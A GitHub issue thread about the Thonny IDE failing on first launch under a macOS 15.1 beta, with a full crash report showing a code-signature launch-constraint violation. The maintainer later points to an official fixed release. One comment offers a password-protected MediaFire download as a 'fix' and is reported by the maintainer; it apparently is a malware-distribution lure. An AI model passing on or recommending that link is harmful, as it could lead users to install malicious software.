thonny/thonny #3292: Code Signature Invalid - MacOS first run error

KunalGehlot, 2024-08-27:
When installing Thonny fresh on a Mac, the following error pops up on first run. 
(It could also be because I'm on MacOS 15.1 Developer Beta)

Full error report below

```
-------------------------------------
Translated Report (Full Report Below)
-------------------------------------

Incident Identifier: 9DFA8463-0812-4D87-B646-CA78683E54FC
CrashReporter Key:   516B27E2-1075-E64B-1ABA-593318611D9E
Hardware Model:      Mac14,10
Process:             Python [22996]
Path:                /Applications/Thonny.app/Contents/Frameworks/Python.framework/Versions/3.10/Resources/Python.app/Contents/MacOS/Python
Identifier:          org.python.python
Version:             3.10.11 (3.10.11)
Code Type:           ARM-64 (Native)
Role:                Default
Parent Process:      launchd [1]
Coalition:           org.thonny.Thonny [17635]

Date/Time:           2024-08-27 10:23:33.3119 +0200
Launch Time:         2024-08-27 10:23:33.2884 +0200
OS Version:          macOS 15.1 (24B5024e)
Release Type:        User
Report Version:      104

Exception Type:  EXC_CRASH (SIGKILL (Code Signature Invalid))
Exception Codes: 0x0000000000000000, 0x0000000000000000
Termination Reason: CODESIGNING 4 Launch Constraint Violation

Triggered by Thread:  0

Thread 0 Crashed:
0   dyld_path_missing             	       0x100800b30 _dyld_start + 0

Thread 0 crashed with ARM Thread State (64-bit):
    x0: 0x0000000000000000   x1: 0x0000000000000000   x2: 0x0000000000000000   x3: 0x0000000000000000
    x4: 0x0000000000000000   x5: 0x0000000000000000   x6: 0x0000000000000000   x7: 0x0000000000000000
    x8: 0x0000000000000000   x9: 0x0000000000000000  x10: 0x0000000000000000  x11: 0x0000000000000000
   x12: 0x0000000000000000  x13: 0x0000000000000000  x14: 0x0000000000000000  x15: 0x0000000000000000
   x16: 0x0000000000000000  x17: 0x0000000000000000  x18: 0x0000000000000000  x19: 0x0000000000000000
   x20: 0x0000000000000000  x21: 0x0000000000000000  x22: 0x0000000000000000  x23: 0x0000000000000000
   x24: 0x0000000000000000  x25: 0x0000000000000000  x26: 0x0000000000000000  x27: 0x0000000000000000
   x28: 0x0000000000000000   fp: 0x0000000000000000   lr: 0x0000000000000000
    sp: 0x000000016f767aa8   pc: 0x0000000100800b30 cpsr: 0x00001000
   far: 0x0000000000000000  esr: 0x00000000  Address size fault

Binary Images:
       0x1007fc000 -        0x10087ffff dyld_path_missing (*) <68cc64d1-738b-35fd-968d-0fbd8938819f> /dyld_path_missing
       0x100698000 -        0x10069bfff main_executable_path_missing (*) <ef677878-e7fb-329d-bb8b-0f651210d52b> /main_executable_path_missing
               0x0 - 0xffffffffffffffff ??? (*) <00000000-0000-0000-0000-000000000000> ???

Error Formulating Crash Report:
dyld_process_snapshot_get_shared_cache failed

EOF

-----------
Full Report
-----------

{"app_name":"Python","timestamp":"2024-08-27 10:23:33.00 +0200","app_version":"3.10.11","slice_uuid":"ef677878-e7fb-329d-bb8b-0f651210d52b","build_version":"3.10.11","platform":0,"bundleID":"org.python.python","share_with_app_devs":0,"is_first_party":0,"bug_type":"309","os_version":"macOS 15.1 (24B5024e)","roots_installed":0,"name":"Python","incident_id":"9DFA8463-0812-4D87-B646-CA78683E54FC"}
{
  "uptime" : 67000,
  "procRole" : "Default",
  "version" : 2,
  "userID" : 501,
  "deployVersion" : 210,
  "modelCode" : "Mac14,10",
  "coalitionID" : 17635,
  "osVersion" : {
    "train" : "macOS 15.1",
    "build" : "24B5024e",
    "releaseType" : "User"
  },
  "captureTime" : "2024-08-27 10:23:33.3119 +0200",
  "codeSigningMonitor" : 1,
  "incident" : "9DFA8463-0812-4D87-B646-CA78683E54FC",
  "pid" : 22996,
  "translated" : false,
  "cpuType" : "ARM-64",
  "roots_installed" : 0,
  "bug_type" : "309",
  "procLaunch" : "2024-08-27 10:23:33.2884 +0200",
  "procStartAbsTime" : 1628557621363,
  "procExitAbsTime" : 1628557971415,
  "procName" : "Python",
  "procPath" : "\/Applications\/Thonny.app\/Contents\/Frameworks\/Python.framework\/Versions\/3.10\/Resources\/Python.app\/Contents\/MacOS\/Python",
  "bundleInfo" : {"CFBundleShortVersionString":"3.10.11","CFBundleVersion":"3.10.11","CFBundleIdentifier":"org.python.python"},
  "storeInfo" : {"deviceIdentifierForVendor":"F557B9A6-40EE-5BD9-B8AA-2D34DE5262E3","thirdParty":true},
  "parentProc" : "launchd",
  "parentPid" : 1,
  "coalitionName" : "org.thonny.Thonny",
  "crashReporterKey" : "516B27E2-1075-E64B-1ABA-593318611D9E",
  "codeSigningID" : "org.python.python",
  "codeSigningTeamID" : "2SA9D4CVU8",
  "codeSigningFlags" : 587268609,
  "codeSigningValidationCategory" : 6,
  "codeSigningTrustLevel" : 4294967295,
  "instructionByteStream" : {"beforePC":"4AMA+cEDALAh2DSR4AMUqgdyAZQoAIBSaAIAOfH\/\/xcAAAAAAAAAAA==","atPC":"4AMAkR\/sfJIdAIDSHgCA0gcDABQfAACRYAAf1n8jA9X0T76p\/XsBqQ=="},
  "bootSessionUUID" : "DC271662-72FE-44F9-A86B-A7C5D4F0AA76",
  "wakeTime" : 4366,
  "sleepWakeUUID" : "2E4FD66E-9233-4017-8987-450002252F9D",
  "sip" : "enabled",
  "exception" : {"codes":"0x0000000000000000, 0x0000000000000000","rawCodes":[0,0],"type":"EXC_CRASH","signal":"SIGKILL (Code Signature Invalid)"},
  "termination" : {"flags":66,"code":4,"namespace":"CODESIGNING","indicator":"Launch Constraint Violation"},
  "extMods" : {"caller":{"thread_create":0,"thread_set_state":0,"task_for_pid":0},"system":{"thread_create":0,"thread_set_state":0,"task_for_pid":0},"targeted":{"thread_create":0,"thread_set_state":0,"task_for_pid":0},"warnings":0},
  "faultingThread" : 0,
  "threads" : [{"triggered":true,"id":1926231,"threadState":{"x":[{"value":0},{"value":0},{"value":0},{"value":0},{"value":0},{"value":0},{"value":0},{"value":0},{"value":0},{"value":0},{"value":0},{"value":0},{"value":0},{"value":0},{"value":0},{"value":0},{"value":0},{"value":0},{"value":0},{"value":0},{"value":0},{"value":0},{"value":0},{"value":0},{"value":0},{"value":0},{"value":0},{"value":0},{"value":0}],"flavor":"ARM_THREAD_STATE64","lr":{"value":0},"cpsr":{"value":4096},"fp":{"value":0},"sp":{"value":6165002920},"esr":{"value":0,"description":" Address size fault"},"pc":{"value":4303358768,"matchesCrashFrame":1},"far":{"value":0}},"frames":[{"imageOffset":19248,"symbol":"_dyld_start","symbolLocation":0,"imageIndex":0}]}],
  "usedImages" : [
  {
    "source" : "P",
    "arch" : "arm64e",
    "base" : 4303339520,
    "size" : 540672,
    "uuid" : "68cc64d1-738b-35fd-968d-0fbd8938819f",
    "path" : "\/dyld_path_missing",
    "name" : "dyld_path_missing"
  },
  {
    "source" : "P",
    "arch" : "arm64",
    "base" : 4301881344,
    "size" : 16384,
    "uuid" : "ef677878-e7fb-329d-bb8b-0f651210d52b",
    "path" : "\/main_executable_path_missing",
    "name" : "main_executable_path_missing"
  },
  {
    "size" : 0,
    "source" : "A",
    "base" : 0,
    "uuid" : "00000000-0000-0000-0000-000000000000"
  }
],
  "vmSummary" : "ReadOnly portion of Libraries: Total=880K resident=0K(0%) swapped_out_or_unallocated=880K(100%)\nWritable regions: Total=16.1M written=64K(0%) resident=64K(0%) swapped_out=0K(0%) unallocated=16.0M(100%)\n\n                                VIRTUAL   REGION \nREGION TYPE                        SIZE    COUNT (non-coalesced) \n===========                     =======  ======= \nSTACK GUARD                         16K        1 \nStack                             16.0M        1 \nVM_ALLOCATE                         16K        1 \n__DATA                              32K        2 \n__DATA_CONST                        48K        2 \n__DATA_DIRTY                        16K        1 \n__LINKEDIT                         336K        2 \n__TEXT                             544K        2 \n__TPRO_CONST                       288K        1 \nmapped file                        4.3G       17 \npage table in kernel                64K        1 \n===========                     =======  ======= \nTOTAL                              4.3G       31 \n",
  "legacyInfo" : {
  "threadTriggered" : {

  }
},
  "logWritingSignature" : "7a9cba3da368a6bbec54f302a3e98f333680d8ed",
  "trialInfo" : {
  "rollouts" : [
    {
      "rolloutId" : "5ffde50ce2aacd000d47a95f",
      "factorPackIds" : {

      },
      "deploymentId" : 250000411
    },
    {
      "rolloutId" : "6425c75e4327780c10cc4252",
      "factorPackIds" : {
        "SIRI_HOME_AUTOMATION_INTENT_SELECTION_CACHE" : "642600a457e7664b1698eb32"
      },
      "deploymentId" : 250000006
    }
  ],
  "experiments" : [
    {
      "treatmentId" : "c47ab4cc-c9c3-4b5d-a87c-e2433ce02597",
      "experimentId" : "6639bc6ba73d460582162323",
      "deploymentId" : 400000006
    },
    {
      "treatmentId" : "8e623c71-6481-4f23-9057-c62685e9e27b",
      "experimentId" : "666a00f235f30a24f56c06c3",
      "deploymentId" : 500000003
    }
  ]
},
  "reportNotes" : [
  "dyld_process_snapshot_get_shared_cache failed"
]
}

```

NikhilKumar77777, 2024-08-27:
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

aivarannamaa, 2024-08-27:
@KunalGehlot, I reported this message. Thanks!

KunalGehlot, 2024-08-27:
Duplicate of  #3283, closing

closed 2024-08-27 by KunalGehlot

aivarannamaa, 2024-09-11:
Please try https://github.com/thonny/thonny/releases/download/v4.1.6/thonny-4.1.6.pkg

MartinPacker, 2024-09-11:
Thank you. That got me working on Sequoia.